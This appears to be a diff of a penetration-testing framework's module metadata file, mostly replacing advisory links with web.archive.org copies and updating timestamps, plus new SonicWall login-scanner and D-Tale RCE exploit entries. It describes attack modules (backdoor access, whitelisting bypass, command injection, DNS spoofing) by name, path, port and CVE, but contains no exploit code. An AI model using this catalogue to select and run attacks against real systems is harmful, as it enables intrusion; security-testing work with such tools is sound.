-      "URL-https://www.solarwinds.com/trust-center/security-advisories/cve-2024-28995",
+      "URL-http://web.archive.org/web/20250213123538/https://www.solarwinds.com/trust-center/security-advisories/cve-2024-28995",
      "URL-https://attackerkb.com/topics/2k7UrkHyl3/cve-2024-28995/rapid7-analysis"
    ],
    "platform": "",
@@ -27237,7 +27307,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2024-06-19 13:20:52 +0000",
+    "mod_time": "2025-02-28 09:35:28 +0000",
    "path": "/modules/auxiliary/gather/solarwinds_servu_fileread_cve_2024_28995.rb",
    "is_install_path": true,
    "ref_name": "gather/solarwinds_servu_fileread_cve_2024_28995",
@@ -27277,8 +27347,8 @@
    "description": "This module exploits a backdoor in SolarWinds Web Help Desk <= v12.8.3 to retrieve all tickets from the system.",
    "references": [
      "CVE-2024-28987",
-      "URL-https://www.solarwinds.com/trust-center/security-advisories/cve-2024-28987",
-      "URL-https://support.solarwinds.com/SuccessCenter/s/article/SolarWinds-Web-Help-Desk-12-8-3-Hotfix-2",
+      "URL-http://web.archive.org/web/20250212002353/https://www.solarwinds.com/trust-center/security-advisories/cve-2024-28987",
+      "URL-http://web.archive.org/web/20250212002353/https://support.solarwinds.com/SuccessCenter/s/article/SolarWinds-Web-Help-Desk-12-8-3-Hotfix-2",
      "URL-https://www.horizon3.ai/attack-research/cve-2024-28987-solarwinds-web-help-desk-hardcoded-credential-vulnerability-deep-dive/"
    ],
    "platform": "",
@@ -27300,7 +27370,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2024-10-31 10:56:56 +0000",
+    "mod_time": "2025-02-28 09:35:28 +0000",
    "path": "/modules/auxiliary/gather/solarwinds_webhelpdesk_backdoor.rb",
    "is_install_path": true,
    "ref_name": "gather/solarwinds_webhelpdesk_backdoor",
@@ -28382,7 +28452,7 @@
    "references": [
      "CVE-2016-2055",
      "PACKETSTORM-135758",
-      "URL-https://lists.xymon.com/pipermail/xymon/2016-February/042986.html",
+      "URL-http://web.archive.org/web/20240519104648/https://lists.xymon.com/pipermail/xymon/2016-February/042986.html",
      "URL-https://xymon.sourceforge.net/",
      "URL-https://en.wikipedia.org/wiki/Xymon",
      "URL-https://en.wikipedia.org/wiki/Big_Brother_(software)"
@@ -28397,7 +28467,7 @@

    ],
    "targets": null,
-    "mod_time": "2023-04-12 13:09:34 +0000",
+    "mod_time": "2025-02-28 09:35:28 +0000",
    "path": "/modules/auxiliary/gather/xymon_info.rb",
    "is_install_path": true,
    "ref_name": "gather/xymon_info",
@@ -32018,7 +32088,7 @@
      "CVE-2012-5192",
      "OSVDB-86599",
      "EDB-22216",
-      "URL-https://www.trustwave.com/spiderlabs/advisories/TWSL2012-016.txt"
+      "URL-http://web.archive.org/web/20130827041908/https://www.trustwave.com/spiderlabs/advisories/TWSL2012-016.txt"
    ],
    "platform": "",
    "arch": "",
@@ -32039,7 +32109,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2025-02-28 09:35:28 +0000",
    "path": "/modules/auxiliary/scanner/http/bitweaver_overlay_type_traversal.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/bitweaver_overlay_type_traversal",
@@ -32322,7 +32392,7 @@
    "references": [
      "URL-https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html",
      "URL-https://www.mandiant.com/resources/breaking-down-the-china-chopper-web-shell-part-ii",
-      "URL-https://www.exploit-db.com/docs/27654.pdf",
+      "URL-http://web.archive.org/web/20170214000632/https://www.exploit-db.com/docs/27654.pdf",
      "URL-https://www.cisa.gov/uscert/ncas/alerts/TA15-314A",
      "URL-http://blog.csdn.net/nixawk/article/details/40430329"
    ],
@@ -32345,7 +32415,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2024-05-03 10:45:37 +0000",
+    "mod_time": "2025-02-28 09:35:28 +0000",
    "path": "/modules/auxiliary/scanner/http/caidao_bruteforce_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/caidao_bruteforce_login",
@@ -36006,7 +36076,7 @@
    ],
    "description": "This module can detect situations where there may be information\n        disclosure vulnerabilities that occur when a Git repository is made\n        available over HTTP.",
    "references": [
-      "URL-https://github.com/git/git/blob/master/Documentation/technical/index-format.txt"
+      "URL-http://web.archive.org/web/20220609025426/https://github.com/git/git/blob/master/Documentation/technical/index-format.txt"
    ],
    "platform": "",
    "arch": "",
@@ -36027,7 +36097,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2025-02-28 09:35:28 +0000",
    "path": "/modules/auxiliary/scanner/http/git_scanner.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/git_scanner",
@@ -37621,7 +37691,7 @@
      "CVE-2002-0422",
      "BID-1499",
      "EDB-20096",
-      "URL-https://support.microsoft.com/en-us/help/218180/internet-information-server-returns-ip-address-in-http-header-content",
+      "URL-http://web.archive.org/web/20201125004436/https://support.microsoft.com/en-us/help/218180/internet-information-server-returns-ip-address-in-http-header-content",
      "URL-https://support.microsoft.com/en-us/topic/fix-the-internal-ip-address-of-an-iis-7-0-server-is-revealed-if-an-http-request-that-does-not-have-a-host-header-or-has-a-null-host-header-is-sent-to-the-server-c493e9bc-dfd3-0d9b-941c-b2d93a957d9e",
      "URL-https://techcommunity.microsoft.com/t5/iis-support-blog/iis-web-servers-running-in-windows-azure-may-reveal-their/ba-p/826500"
    ],
@@ -37644,7 +37714,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2022-01-23 15:28:32 +0000",
+    "mod_time": "2025-02-28 09:35:28 +0000",
    "path": "/modules/auxiliary/scanner/http/iis_internal_ip.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/iis_internal_ip",
@@ -37677,7 +37747,7 @@
    "description": "The vulnerability is caused by a tilde character \"~\" in a GET or OPTIONS request, which\n         could allow remote attackers to disclose 8.3 filenames (short names). In 2010, Soroush Dalili\n         and Ali Abbasnejad discovered the original bug (GET request). This was publicly disclosed in\n         2012. In 2014, Soroush Dalili discovered that newer IIS installations are vulnerable with OPTIONS.",
    "references": [
      "URL-https://soroush.secproject.com/blog/tag/iis-tilde-vulnerability/",
-      "URL-https://support.detectify.com/customer/portal/articles/1711520-microsoft-iis-tilde-vulnerability"
+      "URL-http://web.archive.org/web/20150921104258/http://support.detectify.com/customer/portal/articles/1711520-microsoft-iis-tilde-vulnerability"
    ],
    "platform": "",
    "arch": "",
@@ -37698,7 +37768,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2022-01-23 15:28:32 +0000",
+    "mod_time": "2025-02-28 09:35:28 +0000",
    "path": "/modules/auxiliary/scanner/http/iis_shortname_scanner.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/iis_shortname_scanner",
@@ -37830,8 +37900,8 @@
    "description": "This module scans for Intel Active Management Technology endpoints and attempts\n        to bypass authentication using a blank HTTP digest (CVE-2017-5689). This service\n        can be found on ports 16992, 16993 (tls), 623, and 624 (tls).",
    "references": [
      "CVE-2017-5689",
-      "URL-https://www.embedi.com/news/what-you-need-know-about-intel-amt-vulnerability",
-      "URL-https://www.intel.com/content/www/us/en/security-center/default.html?intelid=INTEL-SA-00075&languageid=en-fr"
+      "URL-http://web.archive.org/web/20191225124314/https://www.embedi.com/news/what-you-need-know-about-intel-amt-vulnerability",
+      "URL-http://web.archive.org/web/20250208090258/https://www.intel.com/content/www/us/en/security-center/default.html?intelid=INTEL-SA-00075"
    ],
    "platform": "",
    "arch": "",
@@ -37852,7 +37922,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2022-01-23 15:28:32 +0000",
+    "mod_time": "2025-02-28 09:35:28 +0000",
    "path": "/modules/auxiliary/scanner/http/intel_amt_digest_bypass.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/intel_amt_digest_bypass",
@@ -44685,7 +44755,7 @@
    "references": [
      "CVE-2017-1001000",
      "WPVDB-8734",
-      "URL-https://blog.sucuri.net/2017/02/content-injection-vulnerability-wordpress-rest-api.html",
+      "URL-http://web.archive.org/web/20250221003135/https://blog.sucuri.net/2017/02/content-injection-vulnerability-wordpress-rest-api.html",
      "URL-https://www.php.net/manual/en/language.types.type-juggling.php",
      "URL-https://developer.wordpress.org/rest-api/using-the-rest-api/discovery/",
      "URL-https://developer.wordpress.org/rest-api/reference/posts/"
@@ -44709,7 +44779,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2022-01-23 15:28:32 +0000",
+    "mod_time": "2025-02-28 09:35:28 +0000",
    "path": "/modules/auxiliary/scanner/http/wordpress_content_injection.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/wordpress_content_injection",
@@ -44806,7 +44876,7 @@
    "references": [
      "CVE-2015-0235",
      "URL-https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/ghost-gethostbyname-heap-overflow-in-glibc-cve-2015-0235/",
-      "URL-https://blog.sucuri.net/2015/01/critical-ghost-vulnerability-released.html"
+      "URL-http://web.archive.org/web/20250117140537/https://blog.sucuri.net/2015/01/critical-ghost-vulnerability-released.html"
    ],
    "platform": "",
    "arch": "",
@@ -44827,7 +44897,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2021-01-21 20:51:29 +0000",
+    "mod_time": "2025-02-28 09:35:28 +0000",
    "path": "/modules/auxiliary/scanner/http/wordpress_ghost_scanner.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/wordpress_ghost_scanner",
@@ -44913,7 +44983,7 @@
    "description": "This module attempts to find Wordpress credentials by abusing the XMLRPC\n        APIs. Wordpress versions prior to 4.4.1 are suitable for this type of\n        technique. For newer versions, the script will drop the CHUNKSIZE to 1 automatically.",
    "references": [
      "URL-https://blog.cloudflare.com/a-look-at-the-new-wordpress-brute-force-amplification-attack/",
-      "URL-https://blog.sucuri.net/2014/07/new-brute-force-attacks-exploiting-xmlrpc-in-wordpress.html"
+      "URL-http://web.archive.org/web/20250220003829/https://blog.sucuri.net/2014/07/new-brute-force-attacks-exploiting-xmlrpc-in-wordpress.html"
    ],
    "platform": "",
    "arch": "",
@@ -44934,7 +45004,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2024-05-03 10:45:37 +0000",
+    "mod_time": "2025-02-28 09:35:28 +0000",
    "path": "/modules/auxiliary/scanner/http/wordpress_multicall_creds.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/wordpress_multicall_creds",
@@ -45795,7 +45865,7 @@
    "description": "This module exploits a directory traversal vulnerability in WordPress Plugin\n        GI-Media Library version 2.2.2, allowing to read arbitrary files from the\n        system with the web server privileges. This module has been tested successfully\n        on GI-Media Library version 2.2.2 with WordPress 4.1.3 on Ubuntu 12.04 Server.",
    "references": [
      "WPVDB-7754",
-      "URL-http://wordpressa.quantika14.com/repository/index.php?id=24"
+      "URL-http://web.archive.org/web/20191021124407/http://wordpressa.quantika14.com/repository/index.php?id=24"
    ],
    "platform": "",
    "arch": "",
@@ -45816,7 +45886,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2025-02-28 09:35:28 +0000",
    "path": "/modules/auxiliary/scanner/http/wp_gimedia_library_file_read.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/wp_gimedia_library_file_read",
@@ -48141,7 +48211,7 @@
    ],
    "description": "This module attempts to connect to the specified Cisco Smart Install port\n          and determines if it speaks the Smart Install Protocol.  Exposure of SMI\n          to untrusted networks can allow complete compromise of the switch.",
    "references": [
-      "URL-https://blog.talosintelligence.com/2017/02/cisco-coverage-for-smart-install-client.html",
+      "URL-http://web.archive.org/web/20221003014218/http://blog.talosintelligence.com/2017/02/cisco-coverage-for-smart-install-client.html",
      "URL-https://blogs.cisco.com/security/cisco-psirt-mitigating-and-detecting-potential-abuse-of-cisco-smart-install-feature",
      "URL-https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170214-smi",
      "URL-https://github.com/Cisco-Talos/smi_check",
@@ -48157,7 +48227,7 @@

    ],
    "targets": null,
-    "mod_time": "2022-01-23 15:28:32 +0000",
+    "mod_time": "2025-02-28 09:35:28 +0000",
    "path": "/modules/auxiliary/scanner/misc/cisco_smart_install.rb",
    "is_install_path": true,
    "ref_name": "scanner/misc/cisco_smart_install",
@@ -52870,7 +52940,7 @@
    "description": "This module can be used to leverage functionality exposed by Redis to\n          achieve somewhat arbitrary file upload to a file and directory to\n          which the user account running the redis instance has access.  It is\n          not totally arbitrary because the exact contents of the file cannot\n          be completely controlled given the nature of how Redis stores its\n          database on disk.",
    "references": [
      "URL-http://antirez.com/news/96",
-      "URL-http://blog.knownsec.com/2015/11/analysis-of-redis-unauthorized-of-expolit/",
+      "URL-http://web.archive.org/web/20240907110448/https://blog.knownsec.com/2015/11/analysis-of-redis-unauthorized-of-expolit/",
      "URL-https://redis.io/topics/protocol"
    ],
    "platform": "",
@@ -52883,7 +52953,7 @@

    ],
    "targets": null,
-    "mod_time": "2024-01-07 15:02:53 +0000",
+    "mod_time": "2025-02-28 09:35:28 +0000",
    "path": "/modules/auxiliary/scanner/redis/file_upload.rb",
    "is_install_path": true,
    "ref_name": "scanner/redis/file_upload",
@@ -57032,7 +57102,7 @@
    ],
    "description": "This module extracts password hashes from certain Brocade load\n        balancer devices.",
    "references": [
-      "URL-https://www.rapid7.com/blog/post/2014/05/15/r7-2014-01-r7-2014-02-r7-2014-03-disclosures-exposure-of-critical-information-via-snmp-public-community-string/"
+      "URL-http://web.archive.org/web/20220819052410/https://www.rapid7.com/blog/post/2014/05/15/r7-2014-01-r7-2014-02-r7-2014-03-disclosures-exposure-of-critical-information-via-snmp-public-community-string/"
    ],
    "platform": "",
    "arch": "",
@@ -57044,7 +57114,7 @@

    ],
    "targets": null,
-    "mod_time": "2022-01-23 15:28:32 +0000",
+    "mod_time": "2025-02-28 09:35:28 +0000",
    "path": "/modules/auxiliary/scanner/snmp/brocade_enumhash.rb",
    "is_install_path": true,
    "ref_name": "scanner/snmp/brocade_enumhash",
@@ -57249,7 +57319,7 @@
    ],
    "description": "This module extracts WEP keys and WPA preshared keys from\n        certain Netopia cable modems.",
    "references": [
-      "URL-https://www.rapid7.com/blog/post/2014/05/15/r7-2014-01-r7-2014-02-r7-2014-03-disclosures-exposure-of-critical-information-via-snmp-public-community-string/"
+      "URL-http://web.archive.org/web/20220819052410/https://www.rapid7.com/blog/post/2014/05/15/r7-2014-01-r7-2014-02-r7-2014-03-disclosures-exposure-of-critical-information-via-snmp-public-community-string/"
    ],
    "platform": "",
    "arch": "",
@@ -57261,7 +57331,7 @@

    ],
    "targets": null,
-    "mod_time": "2022-01-23 15:28:32 +0000",
+    "mod_time": "2025-02-28 09:35:28 +0000",
    "path": "/modules/auxiliary/scanner/snmp/netopia_enum.rb",
    "is_install_path": true,
    "ref_name": "scanner/snmp/netopia_enum",
@@ -57592,7 +57662,7 @@
    ],
    "description": "This module will extract WEP keys and WPA preshared keys from\n        certain Ubee cable modems.",
    "references": [
-      "URL-https://www.rapid7.com/blog/post/2014/05/15/r7-2014-01-r7-2014-02-r7-2014-03-disclosures-exposure-of-critical-information-via-snmp-public-community-string/"
+      "URL-http://web.archive.org/web/20220819052410/https://www.rapid7.com/blog/post/2014/05/15/r7-2014-01-r7-2014-02-r7-2014-03-disclosures-exposure-of-critical-information-via-snmp-public-community-string/"
    ],
    "platform": "",
    "arch": "",
@@ -57604,7 +57674,7 @@

    ],
    "targets": null,
-    "mod_time": "2022-01-23 15:28:32 +0000",
+    "mod_time": "2025-02-28 09:35:28 +0000",
    "path": "/modules/auxiliary/scanner/snmp/ubee_ddw3611.rb",
    "is_install_path": true,
    "ref_name": "scanner/snmp/ubee_ddw3611",
@@ -57660,6 +57730,66 @@

    ]
  },
+  "auxiliary_scanner/sonicwall/login_scanner": {
+    "name": "SonicWall HTTP Login Scanner",
+    "fullname": "auxiliary/scanner/sonicwall/login_scanner",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "auxiliary",
+    "author": [
+      "msutovsky-r7"
+    ],
+    "description": "This module adds HTTP Login scanning for SonicWall NSv. It allows scanning both admin and user accounts.",
+    "references": [
+
+    ],
+    "platform": "",
+    "arch": "",
+    "rport": 4433,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": null,
+    "mod_time": "2025-03-04 08:19:49 +0000",
+    "path": "/modules/auxiliary/scanner/sonicwall/login_scanner.rb",
+    "is_install_path": true,
+    "ref_name": "scanner/sonicwall/login_scanner",
+    "check": false,
+    "post_auth": true,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+
+      ],
+      "SideEffects": [
+        "ioc-in-logs",
+        "account-lockouts"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": false,
+    "actions": [
+
+    ]
+  },
  "auxiliary_scanner/ssh/apache_karaf_command_execution": {
    "name": "Apache Karaf Default Credentials Command Execution",
    "fullname": "auxiliary/scanner/ssh/apache_karaf_command_execution",
@@ -58501,7 +58631,7 @@
    "references": [
      "URL-https://security.googleblog.com/2014/10/this-poodle-bites-exploiting-ssl-30.html",
      "CVE-2014-3566",
-      "URL-https://www.openssl.org/~bodo/ssl-poodle.pdf",
+      "URL-http://web.archive.org/web/20240319071045/https://www.openssl.org/~bodo/ssl-poodle.pdf",
      "URL-https://datatracker.ietf.org/doc/rfc8996/",
      "URL-https://datatracker.ietf.org/doc/html/rfc6176",
      "URL-https://datatracker.ietf.org/doc/html/rfc7568",
@@ -58510,7 +58640,7 @@
      "URL-https://drownattack.com/",
      "CVE-2016-0800",
      "CVE-2011-3389",
-      "URL-http://www.isg.rhul.ac.uk/tls/",
+      "URL-http://web.archive.org/web/20240607160328/https://www.isg.rhul.ac.uk/tls/",
      "CVE-2013-2566",
      "CVE-2015-4000",
      "CVE-2022-3358",
@@ -58529,7 +58659,7 @@

    ],
    "targets": null,
-    "mod_time": "2024-01-07 15:02:53 +0000",
+    "mod_time": "2025-02-28 09:35:28 +0000",
    "path": "/modules/auxiliary/scanner/ssl/ssl_version.rb",
    "is_install_path": true,
    "ref_name": "scanner/ssl/ssl_version",
@@ -60596,7 +60726,7 @@
    "references": [
      "CVE-2017-14117",
      "URL-https://www.nomotion.net/blog/sharknatto/",
-      "URL-https://www.rapid7.com/blog/post/2017/09/07/measuring-sharknat-to-exposures/#vulnerability5port49152tcpexposure"
+      "URL-http://web.archive.org/web/20230327172835/https://www.rapid7.com/blog/post/2017/09/07/measuring-sharknat-to-exposures/"
    ],
    "platform": "",
    "arch": "",
@@ -60608,7 +60738,7 @@

    ],
    "targets": null,
-    "mod_time": "2022-01-23 15:28:32 +0000",
+    "mod_time": "2025-02-28 09:35:28 +0000",
    "path": "/modules/auxiliary/scanner/wproxy/att_open_proxy.py",
    "is_install_path": true,
    "ref_name": "scanner/wproxy/att_open_proxy",
@@ -62500,7 +62630,7 @@
    ],
    "description": "This module uses the Regsvr32.exe Application Whitelisting Bypass technique as a way to run a command on\n        a target system. The major advantage of this technique is that you can execute a static command on the target\n        system and dynamically and remotely change the command that will actually run (by changing the value of CMD).\n        This is useful when combined with persistence methods (e.g., a recurring scheduled task) or when flexibility\n        is needed through the use of a single command (e.g., as Rubber Ducky payload).",
    "references": [
-      "URL-http://subt0x10.blogspot.com/2016/04/bypass-application-whitelisting-script.html"
+      "URL-http://web.archive.org/web/20170419145048/http://subt0x10.blogspot.com:80/2016/04/bypass-application-whitelisting-script.html"
    ],
    "platform": "",
    "arch": "",
@@ -62512,7 +62642,7 @@

    ],
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2025-02-28 09:35:28 +0000",
    "path": "/modules/auxiliary/server/regsvr32_command_delivery_server.rb",
    "is_install_path": true,
    "ref_name": "server/regsvr32_command_delivery_server",
@@ -62564,11 +62694,11 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2025-02-04 15:41:33 +0000",
+    "mod_time": "2024-11-12 11:58:57 +0000",
    "path": "/modules/auxiliary/server/relay/esc8.rb",
    "is_install_path": true,
    "ref_name": "server/relay/esc8",
-    "check": false,
+    "check": true,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -63099,7 +63229,7 @@
      "CVE-2008-1447",
      "OSVDB-46776",
      "US-CERT-VU-800113",
-      "URL-http://www.caughq.org/exploits/CAU-EX-2008-0003.txt"
+      "URL-http://web.archive.org/web/20160527135835/http://www.caughq.org/exploits/CAU-EX-2008-0003.txt"
    ],
    "platform": "",
    "arch": "",
@@ -63111,7 +63241,7 @@

    ],
    "targets": null,
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2025-02-28 09:35:28 +0000",
    "path": "/modules/auxiliary/spoof/dns/bailiwicked_domain.rb",
    "is_install_path": true,
    "ref_name": "spoof/dns/bailiwicked_domain",
@@ -63144,7 +63274,7 @@
      "CVE-2008-1447",
      "OSVDB-46776",
      "US-CERT-VU-800113",
-      "URL-http://www.caughq.org/exploits/CAU-EX-2008-0002.txt"
+      "URL-http://web.archive.org/web/20160606120102/http://www.caughq.org:80/exploits/CAU-EX-2008-0002.txt"
    ],
    "platform": "",
    "arch": "",
@@ -63156,7 +63286,7 @@

    ],
    "targets": null,
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2025-02-28 09:35:28 +0000",
    "path": "/modules/auxiliary/spoof/dns/bailiwicked_host.rb",
    "is_install_path": true,
    "ref_name": "spoof/dns/bailiwicked_host",
@@ -66907,7 +67037,7 @@
    "description": "This module exploits a command injection vulnerability in IBM AIX\n          invscout set-uid root utility present in AIX 7.2 and earlier.\n\n          The undocumented -rpm argument can be used to install an RPM file;\n          and the undocumented -o argument passes arguments to the rpm utility\n          without validation, leading to command injection with effective-uid\n          root privileges.\n\n          This module has been tested successfully on AIX 7.2.",
    "references": [
      "CVE-2023-28528",
-      "URL-https://talosintelligence.com/vulnerability_reports/TALOS-2023-1691"
+      "URL-http://web.archive.org/web/20250117163943/https://talosintelligence.com/vulnerability_reports/TALOS-2023-1691"
    ],
    "platform": "AIX,Unix",
    "arch": "cmd",
@@ -66921,7 +67051,7 @@
    "targets": [
      "Automatic"
    ],
-    "mod_time": "2023-05-17 20:17:55 +0000",
+    "mod_time": "2025-02-28 09:35:28 +0000",
    "path": "/modules/exploits/aix/local/invscout_rpm_priv_esc.rb",
    "is_install_path": true,
    "ref_name": "aix/local/invscout_rpm_priv_esc",
@@ -67431,7 +67561,7 @@
    "references": [
      "CVE-2014-3153",
      "URL-http://tinyhack.com/2014/07/07/exploiting-the-futex-bug-and-uncovering-towelroot/",
-      "URL-http://blog.nativeflow.com/the-futex-vulnerability"
+      "URL-http://web.archive.org/web/20160912014145/http://blog.nativeflow.com:80/the-futex-vulnerability"
    ],
    "platform": "Android,Linux",
    "arch": "",
@@ -67449,7 +67579,7 @@
      "Old Samsung",
      "Samsung Grand"
    ],
-    "mod_time": "2023-03-13 10:31:27 +0000",
+    "mod_time": "2025-02-28 09:35:28 +0000",
    "path": "/modules/exploits/android/local/futex_requeue.rb",
    "is_install_path": true,
    "ref_name": "android/local/futex_requeue",
@@ -68199,8 +68329,8 @@
      "CVE-2019-19781",
      "EDB-47901",
      "EDB-47902",
-      "URL-https://support.citrix.com/article/CTX267027/",
-      "URL-https://www.mdsec.co.uk/2020/01/deep-dive-to-citrix-adc-remote-code-execution-cve-2019-19781/",
+      "URL-http://web.archive.org/web/20220608001448/https://support.citrix.com/article/CTX267027",
+      "URL-http://web.archive.org/web/20200707202522/https://www.mdsec.co.uk/2020/01/deep-dive-to-citrix-adc-remote-code-execution-cve-2019-19781/",
      "URL-https://swarm.ptsecurity.com/remote-code-execution-in-citrix-adc/"
    ],
    "platform": "Python,Unix",
@@ -68225,7 +68355,7 @@
      "Python",
      "Unix Command"
    ],
-    "mod_time": "2021-04-15 19:07:50 +0000",
+    "mod_time": "2025-02-28 09:35:28 +0000",
    "path": "/modules/exploits/freebsd/http/citrix_dir_traversal_rce.rb",
    "is_install_path": true,
    "ref_name": "freebsd/http/citrix_dir_traversal_rce",
@@ -70885,7 +71015,7 @@
    "references": [
      "CVE-2024-12356",
      "CVE-2025-1094",
-      "URL-https://www.beyondtrust.com/trust-center/security-advisories/bt24-10",
+      "URL-http://web.archive.org/web/20241226144006/https://www.beyondtrust.com/trust-center/security-advisories/bt24-10",
      "URL-https://www.postgresql.org/support/security/CVE-2025-1094/",
      "URL-https://attackerkb.com/topics/G5s8ZWAbYH/cve-2024-12356/rapid7-analysis"
    ],
@@ -70910,7 +71040,7 @@
    "targets": [
      "Default"
    ],
-    "mod_time": "2025-02-17 16:33:11 +0000",
+    "mod_time": "2025-02-28 09:35:28 +0000",
    "path": "/modules/exploits/linux/http/beyondtrust_pra_rs_unauth_rce.rb",
    "is_install_path": true,
    "ref_name": "linux/http/beyondtrust_pra_rs_unauth_rce",
@@ -72741,7 +72871,7 @@
      "OSVDB-95951",
      "EDB-27283",
      "URL-http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10008",
-      "URL-http://www.dlink.com/us/en/home-solutions/connect/routers/dir-645-wireless-n-home-router-1000",
+      "URL-http://web.archive.org/web/20140122174138/http://www.dlink.com/us/en/home-solutions/connect/routers/dir-645-wireless-n-home-router-1000",
      "URL-http://roberto.greyhats.it/advisories/20130801-dlink-dir645.txt"
    ],
    "platform": "Linux",
@@ -72765,7 +72895,7 @@
    "targets": [
      "D-Link DIR-645 1.03"
    ],
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2025-02-28 09:35:28 +0000",
    "path": "/modules/exploits/linux/http/dlink_authentication_cgi_bof.rb",
    "is_install_path": true,
    "ref_name": "linux/http/dlink_authentication_cgi_bof",
@@ -72795,7 +72925,7 @@
      "OSVDB-89861",
      "EDB-24453",
      "BID-57734",
-      "URL-http://www.dlink.com/uk/en/home-solutions/connect/routers/dir-600-wireless-n-150-home-router",
+      "URL-http://web.archive.org/web/20240619081418/http://www.dlink.com/uk/en/home-solutions/connect/routers/dir-600-wireless-n-150-home-router",
      "URL-http://www.s3cur1ty.de/home-network-horror-days",
      "URL-http://www.s3cur1ty.de/m1adv2013-003"
    ],
@@ -72820,7 +72950,7 @@
    "targets": [
      "Automatic"
    ],
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2025-02-28 11:29:59 +0000",
    "path": "/modules/exploits/linux/http/dlink_command_php_exec_noauth.rb",
    "is_install_path": true,
    "ref_name": "linux/http/dlink_command_php_exec_noauth",
@@ -73269,7 +73399,7 @@
    ],
    "description": "This module exploits an anonymous remote upload and code execution vulnerability on different\n        D-Link devices. The vulnerability is a command injection in the cookie handling process of the\n        lighttpd web server when handling specially crafted cookie values. This module has been\n        successfully tested on D-Link DSP-W110A1_FW105B01 in emulated environment.",
    "references": [
-      "URL-https://github.com/darkarnium/secpub/tree/master/D-Link/DSP-W110"
+      "URL-http://web.archive.org/web/20160125171424/https://github.com/darkarnium/secpub/tree/master/D-Link/DSP-W110"
    ],
    "platform": "Linux",
    "arch": "",
@@ -73293,7 +73423,7 @@
      "MIPS Little Endian",
      "MIPS Big Endian"
    ],
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2025-02-28 09:35:28 +0000",
    "path": "/modules/exploits/linux/http/dlink_dspw110_cookie_noauth_exec.rb",
    "is_install_path": true,
    "ref_name": "linux/http/dlink_dspw110_cookie_noauth_exec",
@@ -73438,7 +73568,7 @@
      "OSVDB-95950",
      "EDB-27283",
      "URL-http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10008",
-      "URL-http://www.dlink.com/us/en/home-solutions/connect/routers/dir-645-wireless-n-home-router-1000",
+      "URL-http://web.archive.org/web/20140122174138/http://www.dlink.com/us/en/home-solutions/connect/routers/dir-645-wireless-n-home-router-1000",
      "URL-http://roberto.greyhats.it/advisories/20130801-dlink-dir645.txt"
    ],
    "platform": "Linux",
@@ -73462,7 +73592,7 @@
    "targets": [
      "Multiple Targets: D-Link DIR-645 v1.03, DIR-300 v2.14, DIR-600"
    ],
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2025-02-28 09:35:28 +0000",
    "path": "/modules/exploits/linux/http/dlink_hedwig_cgi_bof.rb",
    "is_install_path": true,
    "ref_name": "linux/http/dlink_hedwig_cgi_bof",
@@ -73898,6 +74028,68 @@
    "session_types": false,
    "needs_cleanup": null
  },
+  "exploit_linux/http/dtale_rce_cve_2025_0655": {
+    "name": "D-Tale RCE",
+    "fullname": "exploit/linux/http/dtale_rce_cve_2025_0655",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2025-02-05",
+    "type": "exploit",
+    "author": [
+      "taiphung217",
+      "Takahiro Yokoyama"
+    ],
+    "description": "This exploit effectively serves as a bypass for CVE-2024-3408.\n          An attacker can override global state to enable custom filters, which then facilitates remote code execution.\n          Specifically, this vulnerability leverages the ability to manipulate global application settings to activate the enable_custom_filters feature, typically restricted to trusted environments.\n          Once enabled, the /test-filter endpoint of the Custom Filters functionality can be exploited to execute arbitrary system commands.",
+    "references": [
+      "CVE-2024-3408",
+      "CVE-2025-0655",
+      "URL-https://huntr.com/bounties/f63af7bd-5438-4b36-a39b-4c90466cff13"
+    ],
+    "platform": "Linux",
+    "arch": "",
+    "rport": 40000,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
